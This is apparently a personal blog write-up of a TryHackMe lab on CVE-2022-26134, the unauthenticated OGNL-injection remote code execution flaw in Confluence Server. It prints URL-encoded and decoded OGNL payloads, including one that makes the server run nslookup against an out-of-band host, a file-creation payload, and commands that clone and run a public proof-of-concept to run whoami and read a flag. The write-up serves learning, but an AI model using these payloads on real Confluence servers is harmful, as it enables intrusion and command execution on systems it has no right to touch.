top of page
Search
  • aldern00b
    • Jul 6, 2022
    • 2 min read

Atlassian, CVE-2022-26134 - THM

An interactive lab showcasing the Confluence Server and Data Center un-authenticated RCE vulnerability.

This CVE uses a vulnerability within the OGNL (Object-Graph Navigation Language) expression language for Java (surprise, surprise ... it's Java). OGNL is used for getting and setting properties of Java objects, amongst many other things.


Impacted versions are:

  • 7.4.17

  • 7.13.7

  • 7.14.3

  • 7.15.2

  • 7.16.4

  • 7.17.4

  • 7.18.1

How to tell if the server is vulnerable we can run this

https[:]//yourconfluenceserver[.]com/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20cadcl3mfo0aeq0000010mmku8891cnyrp.oast.me%22%29%7D/

If we decode it, here is how it would look:

https://yourconfluenceserver[.]com/${@java.lang.Runtime@getRuntime().exec("nslookup cadcl3mfo0aeq0000010mmku8891cnyrp.oast.me")

In order to exploit this vulnerability within OGNL, we need to make an HTTP GET request and place our payload within the URI. For example, we can instruct the Java runtime to execute a command such as creating a file on the server: 

${@java.lang.Runtime@getRuntime().exec("touch /tmp/thm/")}/

This will need to be URL encoded, like the following snippet below. You can use this website to help URL encode your payloads (note that your curlpayload will need to end in a trailing / and not $2F):


First, we need to download the PoC to our host. I have decided to clone to the repository using git for this room.

  1. git clone https://github.com/Nwqda/CVE-2022-26134

  2. cd CVE-2022-26134

After navigating to the source code, let's execute the script. Replace "COMMAND" with the command you wish to execute (Remember to use quotation marks when running commands that have special characters and such.)

  1. python3.9 cve-2022-26134.py HTTP://10.10.244.78:8090 COMMAND

You HAVE to use python version 3.9 for this script to work.

Here's what it looks like on an NMAP scan


I'm noticing a login page found too:

As we peek around, the readme from the vuln that we downloaded gives us some examples of URLs we can use:



Craft a payload to identify what user the application is running as. What is the user? confluence
python3.9 cve-2022-26134.py http://10.10.244.78:8090 whoami
Finally, craft a payload to retrieve the flag stored at /flag.txt on 10.10.244.78. What is the flag? THM{OGNL_VULN}
python3.9 cve-2022-26134.py http://10.10.244.78:8090 "less /flag.txt"

If we walk through the python script we can see there's three arguments for this script, the target, the command and then the version, which is passed automatically and run first. We can see they're first getting a 200 response code from the URI

The we see them build out the payload below and then check for a 302 status.

%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getR$

6 views0 comments

Recent Posts

See All

Comments

bottom of page